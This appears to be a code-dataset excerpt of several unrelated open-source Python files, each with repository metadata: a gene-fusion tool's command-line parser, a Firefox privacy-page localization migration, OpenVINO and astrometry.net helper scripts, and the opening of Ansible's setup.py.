SOAPFuse           | final.*.for.trans.txt | soapfuse-final-transcript
STAR Fusion        | _candidates.final     | star-fusion_final
TopHat Fusion pre  | fusions.out           | tophat-fusion_pre
TopHat Fusion post | potential_fusion.txt  | tophat-fusion_post_potential_fusion
TopHat Fusion post | result.txt            | tophat-fusion_post_result
TopHat Fusion post | result.html           | tophat-fusion_post_result_html

The file formats that are supported in the direction (5' -> 3') specific mode are:
 - chimerascan
 - defuse
 - fusion-catcher_final
 - tophat-fusion_pre
 - tophat-fusion_post_potential_fusion
 - rna-star_chimeric
 - soapfuse-final-gene
 - soapfuse-final-transcript

************* EricScript often contains entries with unknown breakpoints.
Because no genomic coordinates are given, those fusion genes can not be
imported into FuMa and only those with breakpoints will be taken into account.
"""


def CLI(argv=None):
    """Command Line Interface

    base command line interface of FuMa
    """
    parser = argparse.ArgumentParser()
    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,epilog="For more info please visit:\n<https://github.com/yhoogstrate/fuma>")
    parser.add_argument('-V','--version', action='version', version=textwrap.dedent("%(prog)s "+fuma.__version__+"\n\nCopyright (C) 2013-"+str(datetime.datetime.now().year)+" Youri Hoogstrate.\n\nLicense GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\n"))
    parser.add_argument('--formats', action='version', version=show_formats(), help="show accepted dataset formats")

    parser.add_argument("-m",'--matching-method',choices=['overlap','subset','egm'],default='subset',help='The used method to match two gene sets. Overlap matches when two gene sets have one or more genes overlapping. Subset matches when one gene set is a subset of the other. EGM is exact gene matching; all genes in both sets need to be identical to match.')

    parser.add_argument('--strand-specific-matching', dest='strand_specific_matching', action='store_true', help='Consider fusion genes distinct when the breakpoints have different strands: (A<-,B<-) != (->A,B<-); default')
    parser.add_argument('--no-strand-specific-matching', dest='strand_specific_matching', action='store_false', help='Consider fusion genes identical when the breakpoints have different strands: (A<-,B<-) == (->A,B<-)')
    parser.set_defaults(strand_specific_matching=True)

    parser.add_argument('--acceptor-donor-order-specific-matching', dest='acceptor_donor_order_specific_matching', action='store_true', help='Consider fusion genes distinct when the donor and acceptor sites are swapped: (A,B) != (B,A)')
    parser.add_argument('--no-acceptor-donor-order-specific-matching', dest='acceptor_donor_order_specific_matching', action='store_false', help='Consider fusion genes identical when the donor and acceptor sites are swapped: (A,B) == (B,A); default')
    parser.set_defaults(acceptor_donor_order_specific_matching=False)

    parser.add_argument("--verbose", help="increase output verbosity", action="store_true")

    parser.add_argument("-a","--add-gene-annotation",help="annotation_alias:filename  * file in BED format",nargs="*")
    parser.add_argument("-s","--add-sample",nargs="+",required=True,help="sample_alias:format:filename (available formats: %(prog)s --formats)")
    parser.add_argument("-l","--link-sample-to-annotation",help="sample_alias:annotation_alias",nargs="*")

    parser.add_argument("-f","--format",default="list",choices=["summary","list","extensive"],help="Output-format")
    parser.add_argument("-g","--long-gene-size",default=200000,type=int,help="Gene-name based matching is more sensitive to long genes. This is the gene size used to mark fusion genes spanning a 'long gene' as reported the output. Use 0 to disable this feature.")

    parser.add_argument("-o","--output",help="output filename; '-' for stdout",default="output_fuma.txt")

    if(argv == None):
        return parser.parse_args()
    else:
        # Argumented parameters are used in the unit tests.
        return parser.parse_args(argv)


def CLI_ensmble_gtf_to_bed_converter(argv=None):
    """CLI for gtf to bed converter
    """
    parser = argparse.ArgumentParser()
    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,epilog="For more info please visit:\n<https://github.com/yhoogstrate/fuma>")
    parser.add_argument('-V','--version', action='version', version=textwrap.dedent("%(prog)s "+fuma.__version__+"\n\nCopyright (C) 2013-"+str(datetime.datetime.now().year)+" Youri Hoogstrate.\n\nLicense GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\n"))

    parser.add_argument("-o","--output",help="output filename; '-' for stdout",default="-")
    parser.add_argument("genecode_gtf_file",nargs=1,help="Input GTF file, e.g. 'gencode_gtf_file.gtf' - not as .gz")

    if(argv == None):
        return parser.parse_args()
    else:
        # Argumented parameters are used in the unit tests.
        return parser.parse_args(argv)
ErasmusMC-Bioinformatics/fuma
fuma/CLI.py
Python
gpl-3.0
7,199
[ "VisIt" ]
700cca22b00a9f33cf54a0ce73a72d40e5fa474566e757505260c69ed627b4f6
from __future__ import absolute_import
import fluent.syntax.ast as FTL
from fluent.migrate.helpers import transforms_from
from fluent.migrate.helpers import VARIABLE_REFERENCE, TERM_REFERENCE
from fluent.migrate import REPLACE, COPY

privacy_hub = "firefox/privacy-hub.lang"


def migrate(ctx):
    """Migrate bedrock/firefox/templates/firefox/privacy/base.html, part {index}."""

    ctx.add_transforms(
        "firefox/privacy-hub.ftl",
        "firefox/privacy-hub.ftl",
        [
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-firefox-privacy-promise"),
                value=REPLACE(
                    privacy_hub,
                    "Firefox Privacy Promise",
                    {
                        "Firefox": TERM_REFERENCE("brand-name-firefox"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-firefox-takes-less-data-keeps"),
                value=REPLACE(
                    privacy_hub,
                    "Firefox takes less data, keeps it safe, and with no secrets.",
                    {
                        "Firefox": TERM_REFERENCE("brand-name-firefox"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-firefox-products-are-designed"),
                value=REPLACE(
                    privacy_hub,
                    "Firefox products are designed to protect your <strong>privacy</strong>",
                    {
                        "Firefox": TERM_REFERENCE("brand-name-firefox"),
                    }
                )
            ),
        ] + transforms_from("""
firefox-privacy-privacy = {COPY(privacy_hub, "Privacy",)}
firefox-privacy-our-promise = {COPY(privacy_hub, "Our Promise",)}
firefox-privacy-our-products = {COPY(privacy_hub, "Our Products",)}
firefox-privacy-hub-you-should-be-able-to-decide = {COPY(privacy_hub, "You should be able to decide who sees your personal info. Not just among your friends, but with every advertiser and company on the internet — including us.",)}
firefox-privacy-hub-thats-why-everything-we-make = {COPY(privacy_hub, "That’s why everything we make and do honors our Personal Data Promise",)}
firefox-privacy-hub-take-less = {COPY(privacy_hub, "Take Less",)}
firefox-privacy-hub-we-make-a-point-of-knowing = {COPY(privacy_hub, "We make a point of knowing less about you",)}
firefox-privacy-hub-all-tech-companies-collect = {COPY(privacy_hub, "All tech companies collect data to improve their products. But it doesn’t need to include so much of your personal info. The only data we want is the data that serves you in the end. We ask ourselves: do we actually need this? What do we need it for? And when can we delete it?",)}
firefox-privacy-hub-keep-it-safe = {COPY(privacy_hub, "Keep it safe",)}
firefox-privacy-hub-we-do-the-hard-work-to-protect = {COPY(privacy_hub, "We do the hard work to protect your personal info",)}
firefox-privacy-hub-data-security-is-complicated = {COPY(privacy_hub, "Data security is complicated — or at least it should be. Which is why we take the extra steps to classify the data we have, maintain rules for how we store and protect each type, and never stop iterating on our processes. We prioritize your privacy. We invest in it. We’re committed to it. We even teach other companies how to do it.",)}
firefox-privacy-hub-no-secrets = {COPY(privacy_hub, "No secrets",)}
firefox-privacy-hub-youll-always-know-where-you = {COPY(privacy_hub, "You’ll always know where you stand with us",)}
""", privacy_hub=privacy_hub) + [
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-theres-no-hidden-agenda-here"),
                value=REPLACE(
                    privacy_hub,
                    "There’s no hidden agenda here. Our business doesn’t depend on secretly abusing your trust. Our <a href=\"%(privacy)s\">Privacy Notice</a> is actually readable. Anyone in the world can attend our <a href=\"%(meetings)s\">weekly company meetings</a>. If you want to dig into every datapoint we collect, our code is open. And so are we.",
                    {
                        "%%": "%",
                        "%(privacy)s": VARIABLE_REFERENCE("privacy"),
                        "%(meetings)s": VARIABLE_REFERENCE("meetings"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-why-trust-firefox"),
                value=REPLACE(
                    privacy_hub,
                    "Why trust Firefox?",
                    {
                        "Firefox": TERM_REFERENCE("brand-name-firefox"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-because-we-put-people-first"),
                value=REPLACE(
                    privacy_hub,
                    "Because we put people first. In fact, we’re backed by a <a href=\"%(foundation)s\">non-profit</a>. From day one, it’s been our mission to protect the internet and everyone on it",
                    {
                        "%%": "%",
                        "%(foundation)s": VARIABLE_REFERENCE("foundation"),
                    }
                )
            ),
        ] + transforms_from("""
firefox-privacy-hub-learn-more-about-our-mission = {COPY(privacy_hub, "Learn more about our mission",)}
firefox-privacy-hub-your-privacy-by-the-product = {COPY(privacy_hub, "Your privacy, by the product",)}
""", privacy_hub=privacy_hub) + [
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-firefox-products-work-differently"),
                value=REPLACE(
                    privacy_hub,
                    "Firefox products work differently — because they’re designed to protect your privacy first.",
                    {
                        "Firefox": TERM_REFERENCE("brand-name-firefox"),
                    }
                )
            ),
        ] + transforms_from("""
firefox-privacy-hub-learn-about-our-products = {COPY(privacy_hub, "Learn about our products",)}
""", privacy_hub=privacy_hub) + [
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-firefox-privacy-by-the"),
                value=REPLACE(
                    privacy_hub,
                    "Firefox privacy, by the product",
                    {
                        "Firefox": TERM_REFERENCE("brand-name-firefox"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-firefox-protects-your-privacy"),
                value=REPLACE(
                    privacy_hub,
                    "Firefox protects your privacy in every product.",
                    {
                        "Firefox": TERM_REFERENCE("brand-name-firefox"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-firefox-protects-your-privacy-strong"),
                value=REPLACE(
                    privacy_hub,
                    "Firefox <strong>protects</strong> your privacy in every product",
                    {
                        "Firefox": TERM_REFERENCE("brand-name-firefox"),
                    }
                )
            ),
        ] + transforms_from("""
firefox-privacy-hub-firefox-browser = { -brand-name-firefox-browser }
firefox-privacy-hub-2000-trackers-blocked-automatically = {COPY(privacy_hub, "2,000+ trackers blocked — automatically",)}
""", privacy_hub=privacy_hub) + [
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-tracking-has-become-an"),
                value=REPLACE(
                    privacy_hub,
                    "Tracking has become an epidemic online: companies follow every move, click and purchase, collecting data to predict and influence what you’ll do next. We think that’s a gross invasion of your privacy. That’s why Firefox mobile and desktop browsers have Enhanced Tracking Protection on by default.",
                    {
                        "Firefox": TERM_REFERENCE("brand-name-firefox"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-if-you-want-to-see-what"),
                value=REPLACE(
                    privacy_hub,
                    "If you want to see what Firefox is blocking for you, visit this page on your Firefox desktop browser.",
                    {
                        "Firefox": TERM_REFERENCE("brand-name-firefox"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-see-what-firefox-has-blocked"),
                value=REPLACE(
                    privacy_hub,
                    "See what Firefox has blocked for you",
                    {
                        "Firefox": TERM_REFERENCE("brand-name-firefox"),
                    }
                )
            ),
        ] + transforms_from("""
firefox-privacy-hub-get-enhanced-tracking-protection = {COPY(privacy_hub, "Get Enhanced Tracking Protection",)}
""", privacy_hub=privacy_hub) + [
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-download-the-firefox-browser"),
                value=REPLACE(
                    privacy_hub,
                    "Download the Firefox browser",
                    {
                        "Firefox": TERM_REFERENCE("brand-name-firefox"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-update-your-firefox-browser"),
                value=REPLACE(
                    privacy_hub,
                    "Update your Firefox browser",
                    {
                        "Firefox": TERM_REFERENCE("brand-name-firefox"),
                    }
                )
            ),
        ] + transforms_from("""
firefox-privacy-hub-invisible-to-the-top-trackers = {COPY(privacy_hub, "Invisible to the top trackers",)}
firefox-privacy-hub-meet-four-of-the-most-common = {COPY(privacy_hub, "Meet four of the most common categories of trackers — who won’t meet you.",)}
firefox-privacy-hub-always-in-your-control = {COPY(privacy_hub, "Always in your control",)}
firefox-privacy-hub-want-to-customize-what = {COPY(privacy_hub, "Want to customize what gets blocked? Your settings are only one click away.",)}
firefox-privacy-hub-protection-beyond-tracking = {COPY(privacy_hub, "Protection beyond tracking",)}
""", privacy_hub=privacy_hub) + [
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-if-you-have-a-firefox-account"),
                value=REPLACE(
                    privacy_hub,
                    "If you have a Firefox account, you can also see how we’re helping you protect your personal info and passwords.",
                    {
                        "Firefox account": TERM_REFERENCE("brand-name-firefox-account"),
                        "Firefox Account": TERM_REFERENCE("brand-name-firefox-account"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-more-than-s-trackers-blocked"),
                value=REPLACE(
                    privacy_hub,
                    "More than %s trackers blocked each day for Firefox users worldwide",
                    {
                        "%%": "%",
                        "%s": VARIABLE_REFERENCE("trackers"),
                        "Firefox": TERM_REFERENCE("brand-name-firefox"),
                    }
                )
            ),
        ] + transforms_from("""
firefox-privacy-hub-firefox-monitor = { -brand-name-firefox-monitor }
""", privacy_hub=privacy_hub) + [
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-when-you-enter-your-email"),
                value=REPLACE(
                    privacy_hub,
                    "When you enter your email address in Firefox Monitor, we forget it immediately after we’ve checked for a match in known data breaches — unless you authorize us to continue monitoring new breaches for your personal information.",
                    {
                        "Firefox Monitor": TERM_REFERENCE("brand-name-firefox-monitor"),
                    }
                )
            ),
        ] + transforms_from("""
firefox-privacy-hub-check-for-breaches = {COPY(privacy_hub, "Check for breaches",)}
firefox-privacy-hub-firefox-lockwise = { -brand-name-firefox-lockwise }
""", privacy_hub=privacy_hub) + [
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-the-passwords-and-credentials"),
                value=REPLACE(
                    privacy_hub,
                    "The passwords and credentials you save in Firefox Lockwise are encrypted on all your devices, so not even we can see them.",
                    {
                        "Firefox Lockwise": TERM_REFERENCE("brand-name-firefox-lockwise"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-learn-more-about-lockwise"),
                value=REPLACE(
                    privacy_hub,
                    "Learn more about Lockwise",
                    {
                        "Lockwise": TERM_REFERENCE("brand-name-lockwise"),
                    }
                )
            ),
        ] + transforms_from("""
firefox-privacy-hub-firefox-send = { -brand-name-firefox-send }
""", privacy_hub=privacy_hub) + [
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-we-cant-see-the-names-or"),
                value=REPLACE(
                    privacy_hub,
                    "We can’t see the names or content of the large files you share through Firefox Send because they’re encrypted end-to-end — you choose who sees what you send, and you can even set an expiration date and password.",
                    {
                        "Firefox Send": TERM_REFERENCE("brand-name-firefox-send"),
                    }
                )
            ),
        ] + transforms_from("""
firefox-privacy-hub-send-a-file = {COPY(privacy_hub, "Send a file",)}
firefox-privacy-hub-pocket = { -brand-name-pocket }
""", privacy_hub=privacy_hub) + [
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-pocket-recommends-high"),
                value=REPLACE(
                    privacy_hub,
                    "Pocket recommends high-quality, human-curated articles without collecting your browsing history or sharing your personal information with advertisers.",
                    {
                        "Pocket": TERM_REFERENCE("brand-name-pocket"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-get-pocket"),
                value=REPLACE(
                    privacy_hub,
                    "Get Pocket",
                    {
                        "Pocket": TERM_REFERENCE("brand-name-pocket"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-your-firefox-account"),
                value=REPLACE(
                    privacy_hub,
                    "Your Firefox account",
                    {
                        "Firefox account": TERM_REFERENCE("brand-name-firefox-account"),
                        "Firefox Account": TERM_REFERENCE("brand-name-firefox-account"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-all-the-information-synced"),
                value=REPLACE(
                    privacy_hub,
                    "All the information synced through your Firefox account — from browser history to passwords — is encrypted. And your account password is the only key.",
                    {
                        "Firefox account": TERM_REFERENCE("brand-name-firefox-account"),
                        "Firefox Account": TERM_REFERENCE("brand-name-firefox-account"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-take-your-privacy-and-bookmarks"),
                value=REPLACE(
                    privacy_hub,
                    "Take your privacy and bookmarks everywhere with a Firefox account.",
                    {
                        "Firefox account": TERM_REFERENCE("brand-name-firefox-account"),
                        "Firefox Account": TERM_REFERENCE("brand-name-firefox-account"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-already-have-an-account"),
                value=REPLACE(
                    privacy_hub,
                    "Already have an account? <a %(sign_in)s class=\"%(class_name)s\">Sign In</a> or <a href=\"%(learn_more)s\">learn more</a> about joining Firefox.",
                    {
                        "%%": "%",
                        "%(sign_in)s": VARIABLE_REFERENCE("sign_in"),
                        "%(class_name)s": VARIABLE_REFERENCE("class_name"),
                        "%(learn_more)s": VARIABLE_REFERENCE("learn_more"),
                        "Firefox": TERM_REFERENCE("brand-name-firefox"),
                    }
                )
            ),
            FTL.Message(
                id=FTL.Identifier("firefox-privacy-hub-read-the-privacy-notice-for"),
                value=REPLACE(
                    privacy_hub,
                    "Read the <a href=\"%s\">Privacy Notice</a> for our products",
                    {
                        "%%": "%",
                        "%s": VARIABLE_REFERENCE("url"),
                    }
                )
            ),
        ]
    )
hoosteeno/bedrock
lib/fluent_migrations/firefox/privacy.py
Python
mpl-2.0
18,195
[ "VisIt" ]
21b7be8dfd5d2f8cbad7c9cc50727951f2f2cb952740776c863474777fc4e379
#!/usr/bin/env python

import click
import os
import sh


@click.command()
@click.argument('omz_network')
@click.option('-s', '--skip', is_flag=True, help='skip downloading / optimizing')
@click.option('-bs', '--batch_size', default=1, help='minibatch size')
@click.option('-nt', '--num_threads', type=int, help='number of threads to use, defaults to #hyperthreads')
@click.option('-p', '--precision', default='FP32')  # TODO options
@click.option('-d', '--device', default='CPU')  # TODO options
@click.option('--cache_dir', default='~/.cache', help='cache directory')
@click.option('--model_dir', default='~/.cache/omz_models', help='model directory')
@click.option('--report_dir', default='reports', help='cache directory')
def benchmark_app(omz_network, skip, batch_size, num_threads, precision, device,
                  cache_dir, model_dir, report_dir):
    """Downloads models from openmodelzoo and runs them in benchmark_app, optionally creating a report

    \b
    Examples:
        ./benchmark_ov.py resnet-50-tf
        ./benchmark_ov.py -bs 16 -nt 28 -p FP16 bert-base-ner
        ./benchmark_ov.py -d PLAIDML bert-base-ner
    """
    model_dir = os.path.expanduser(os.path.normpath(model_dir))
    cache_dir = os.path.expanduser(os.path.normpath(cache_dir))
    if not skip:
        sh.mkdir('-p', model_dir)
        print('Downloading {0}'.format(omz_network))
        # TODO(brian): make this spit out output easily
        sh.omz_downloader('--cache_dir={0}'.format(cache_dir), name=omz_network, o=model_dir)
        print('Running model optimizer on {0}'.format(omz_network))
        # add_mo_arg='--disable_nhwc_to_nchw',
        sh.omz_converter(name=omz_network, d=model_dir, o=model_dir, precision=precision)
    else:
        print('Skipping download & conversion')
    print('Benchmarking...')
    model_path = os.path.join(model_dir, 'public', omz_network, precision, omz_network + '.xml')
    ba = sh.Command('../.././vendor/openvino/bin/intel64/Release/benchmark_app')
    ba = ba.bake(m=model_path, api='sync', t='15', b=batch_size, d=device,
                 _long_prefix='-', _long_sep=' ')
    if num_threads:
        ba = ba.bake(nstreams=num_threads, _long_prefix='-')
    for line in ba(_iter=True):
        print(line, end='')


if __name__ == '__main__':
    benchmark_app()
plaidml/plaidml
tools/benchmarking/benchmark_ov.py
Python
apache-2.0
2,429
[ "Brian" ]
f29a9aecd4a9ea03856278c0c20c539861e2061f3be5e25d2e2f91dd1d7fe4f1
#!/usr/bin/env python
"""
Script to convert catalogs from VizieR to index files using astrometry.net.
See
https://confluence.lsstcorp.org/display/LSWUG/Building+Astrometry.net+Index+Files
for more information, especially running at lsst-dev.ncsa.illinois.edu using
the ready-built LSST stack (bash --rcfile ~lsstsw/eups/bin/setups.sh).

This script was adapted from the one posted here
http://hsca.ipmu.jp:8080/question/238/how-to-construct-an-astrometry_net_data-catalog/

For using with the LSST stack, a single magnitude seems to be sufficient, and
if not provided, magnitude errors will be using sqrt(flux).
"""
import numpy as np
import pyfits
import subprocess

#infile = 'asu.fit'                  # output catalog from VizieR query
#filter_map = {'u' : (None, None),   # mapping of LSST filter to column name
#              'g' : ('gmag', None), # in VizieR output file (mag, mag_err)
#              'r' : ('rmag', None),
#              'i' : ('imag', None),
#              'z' : ('zmag', None),
#              'y' : (None, None)}

infile = 'asu_nomad_1.fits'          # A different, but deeper catalog,
filter_map = {'r' : ('Rmag', None)}  # that just has r-band data.

stars = True                         # Set False if input is a galaxy catalog
ref_catalog = 'stars_nomad_1.fits'   # Name of output catalog file
                                     # converted from asu.fit
id = '140508'                        # ID for index files built from
                                     # today's date

input = pyfits.open(infile)
nrows = input[1].header['NAXIS2']

schema = pyfits.ColDefs([pyfits.Column(name="id", format="K"),
                         pyfits.Column(name="ra", format="D"),
                         pyfits.Column(name="dec", format="D"),
                         pyfits.Column(name="starnotgal", format='I')]
                        + [pyfits.Column(name=filt, format="E")
                           for filt, filtcol in filter_map.items()
                           if filtcol[0] is not None])

table = pyfits.new_table(schema, nrows=nrows)
table.data.id = np.arange(nrows)
table.data.ra = input[1].data.RAJ2000    # RAJ2000, DEJ2000 should be the
table.data.dec = input[1].data.DEJ2000   # standard VizieR coord column names
if stars:
    table.data.starnotgal = np.array([128]*nrows)
else:
    table.data.starnotgal = np.array([0]*nrows)

for filt, filtcol in filter_map.items():
    column = table.data.field(filt)
    for i in range(len(column)):
        column[i] = input[1].data.field(filtcol[0])[i]

output = pyfits.HDUList()
output.append(pyfits.PrimaryHDU())
output.append(table)
output.writeto(ref_catalog, clobber=True)

#
# The scales for the index files may need to be adjusted depending on
# the density of stars in the reference catalog.
#
master_index_file = 'index-%(id)s00.fits' % locals()
scale = 0
build_command = "build-index -i %(ref_catalog)s -o index-%(id)s00.fits -I %(id)s00 -P %(scale)i -S r -n 100 -L 20 -E -j 0.4 -r 1 > build-00.log" % locals()
print build_command
subprocess.call(build_command, shell=True)

for scale in (1, 2, 3, 4):
    build_command = "build-index -1 %(master_index_file)s -o index-%(id)s%(scale)02i.fits -I %(id)s%(scale)02i -P %(scale)i -S r -L 20 -E -M -j 0.4 > build-%(scale)02i.log" % locals()
    print build_command
    subprocess.call(build_command, shell=True)
DarkEnergyScienceCollaboration/Recipes
python/utensils/make_index_files.py
Python
gpl-2.0
3,384
[ "Galaxy" ]
d7cdc8b1be6e7968d2c5ad16c17af53db73b74a0a9f355c60ad3ef117aad51d1
from __future__ import (absolute_import, division, print_function) __metaclass__ = type import json import os import os.path import re import sys import warnings from collections import defaultdict try: from setuptools import setup, find_packages from setuptools.command.build_py import build_py as BuildPy from setuptools.command.install_lib import install_lib as InstallLib from setuptools.command.install_scripts import install_scripts as InstallScripts except ImportError: print("Ansible now needs setuptools in order to build. Install it using" " your package manager (usually python-setuptools) or via pip (pip" " install setuptools).", file=sys.stderr) sys.exit(1) # `distutils` must be imported after `setuptools` or it will cause explosions # with `setuptools >=48.0.0, <49.1`. # Refs: # * https://github.com/ansible/ansible/issues/70456 # * https://github.com/pypa/setuptools/issues/2230 # * https://github.com/pypa/setuptools/commit/bd110264 from distutils.command.build_scripts import build_scripts as BuildScripts from distutils.command.sdist import sdist as SDist def find_package_info(*file_paths): try: with open(os.path.join(*file_paths), 'r') as f: info_file = f.read() except Exception: raise RuntimeError("Unable to find package info.") # The version line must have the form # __version__ = 'ver' version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", info_file, re.M) author_match = re.search(r"^__author__ = ['\"]([^'\"]*)['\"]", info_file, re.M) if version_match and author_match: return version_match.group(1), author_match.group(1) raise RuntimeError("Unable to find package info.") def _validate_install_ansible_base(): """Validate that we can install ansible-base. Currently this only cares about upgrading to ansible-base from ansible<2.10 """ if os.getenv('ANSIBLE_SKIP_CONFLICT_CHECK', '') not in ('', '0'): return # Save these for later restoring things to pre invocation sys_modules = sys.modules.copy() sys_modules_keys = set(sys_modules) # Make sure `lib` isn't in `sys.path` that could confuse this sys_path = sys.path[:] abspath = os.path.abspath sys.path[:] = [p for p in sys.path if abspath(p) != abspath('lib')] try: from ansible.release import __version__ except ImportError: pass else: version_tuple = tuple(int(v) for v in __version__.split('.')[:2]) if version_tuple < (2, 10): stars = '*' * 76 raise RuntimeError( ''' %s Cannot install ansible-base with a pre-existing ansible==%s installation. Installing ansible-base with ansible-2.9 or older currently installed with pip is known to cause problems. Please uninstall ansible and install the new version: pip uninstall ansible pip install ansible-base If you want to skip the conflict checks and manually resolve any issues afterwards, set the ANSIBLE_SKIP_CONFLICT_CHECK environment variable: ANSIBLE_SKIP_CONFLICT_CHECK=1 pip install ansible-base %s ''' % (stars, __version__, stars) ) finally: sys.path[:] = sys_path for key in sys_modules_keys.symmetric_difference(sys.modules): sys.modules.pop(key, None) sys.modules.update(sys_modules) _validate_install_ansible_base() SYMLINK_CACHE = 'SYMLINK_CACHE.json' def _find_symlinks(topdir, extension=''): """Find symlinks that should be maintained Maintained symlinks exist in the bin dir or are modules which have aliases. Our heuristic is that they are a link in a certain path which point to a file in the same directory. .. 
warn:: We want the symlinks in :file:`bin/` that link into :file:`lib/ansible/*` (currently, :command:`ansible`, :command:`ansible-test`, and :command:`ansible-connection`) to become real files on install. Updates to the heuristic here *must not* add them to the symlink cache. """ symlinks = defaultdict(list) for base_path, dirs, files in os.walk(topdir): for filename in files: filepath = os.path.join(base_path, filename) if os.path.islink(filepath) and filename.endswith(extension): target = os.readlink(filepath) if target.startswith('/'): # We do not support absolute symlinks at all continue if os.path.dirname(target) == '': link = filepath[len(topdir):] if link.startswith('/'): link = link[1:] symlinks[os.path.basename(target)].append(link) else: # Count how many directory levels from the topdir we are levels_deep = os.path.dirname(filepath).count('/') # Count the number of directory levels higher we walk up the tree in target target_depth = 0 for path_component in target.split('/'): if path_component == '..': target_depth += 1 # If we walk past the topdir, then don't store if target_depth >= levels_deep: break else: target_depth -= 1 else: # If we managed to stay within the tree, store the symlink link = filepath[len(topdir):] if link.startswith('/'): link = link[1:] symlinks[target].append(link) return symlinks def _cache_symlinks(symlink_data): with open(SYMLINK_CACHE, 'w') as f: json.dump(symlink_data, f) def _maintain_symlinks(symlink_type, base_path): """Switch a real file into a symlink""" try: # Try the cache first because going from git checkout to sdist is the # only time we know that we're going to cache correctly with open(SYMLINK_CACHE, 'r') as f: symlink_data = json.load(f) except (IOError, OSError) as e: # IOError on py2, OSError on py3. Both have errno if e.errno == 2: # SYMLINKS_CACHE doesn't exist. Fallback to trying to create the # cache now. Will work if we're running directly from a git # checkout or from an sdist created earlier. library_symlinks = _find_symlinks('lib', '.py') library_symlinks.update(_find_symlinks('test/lib')) symlink_data = {'script': _find_symlinks('bin'), 'library': library_symlinks, } # Sanity check that something we know should be a symlink was # found. We'll take that to mean that the current directory # structure properly reflects symlinks in the git repo if 'ansible-playbook' in symlink_data['script']['ansible']: _cache_symlinks(symlink_data) else: raise RuntimeError( "Pregenerated symlink list was not present and expected " "symlinks in ./bin were missing or broken. " "Perhaps this isn't a git checkout?" 
) else: raise symlinks = symlink_data[symlink_type] for source in symlinks: for dest in symlinks[source]: dest_path = os.path.join(base_path, dest) if not os.path.islink(dest_path): try: os.unlink(dest_path) except OSError as e: if e.errno == 2: # File does not exist which is all we wanted pass os.symlink(source, dest_path) class BuildPyCommand(BuildPy): def run(self): BuildPy.run(self) _maintain_symlinks('library', self.build_lib) class BuildScriptsCommand(BuildScripts): def run(self): BuildScripts.run(self) _maintain_symlinks('script', self.build_dir) class InstallLibCommand(InstallLib): def run(self): InstallLib.run(self) _maintain_symlinks('library', self.install_dir) class InstallScriptsCommand(InstallScripts): def run(self): InstallScripts.run(self) _maintain_symlinks('script', self.install_dir) class SDistCommand(SDist): def run(self): # have to generate the cache of symlinks for release as sdist is the # only command that has access to symlinks from the git repo library_symlinks = _find_symlinks('lib', '.py') library_symlinks.update(_find_symlinks('test/lib')) symlinks = {'script': _find_symlinks('bin'), 'library': library_symlinks, } _cache_symlinks(symlinks) SDist.run(self) # Print warnings at the end because no one will see warnings before all the normal status # output if os.environ.get('_ANSIBLE_SDIST_FROM_MAKEFILE', False) != '1': warnings.warn('When setup.py sdist is run from outside of the Makefile,' ' the generated tarball may be incomplete. Use `make snapshot`' ' to create a tarball from an arbitrary checkout or use' ' `cd packaging/release && make release version=[..]` for official builds.', RuntimeWarning) def read_file(file_name): """Read file and return its contents.""" with open(file_name, 'r') as f: return f.read() def read_requirements(file_name): """Read requirements file as a list.""" reqs = read_file(file_name).splitlines() if not reqs: raise RuntimeError( "Unable to read requirements from the %s file. " "That indicates this copy of the source code is incomplete." % file_name ) return reqs PYCRYPTO_DIST = 'pycrypto' def get_crypto_req(): """Detect custom crypto from ANSIBLE_CRYPTO_BACKEND env var. pycrypto or cryptography. We choose a default but allow the user to override it. This translates into pip install of the sdist deciding what package to install and also the runtime dependencies that pkg_resources knows about.
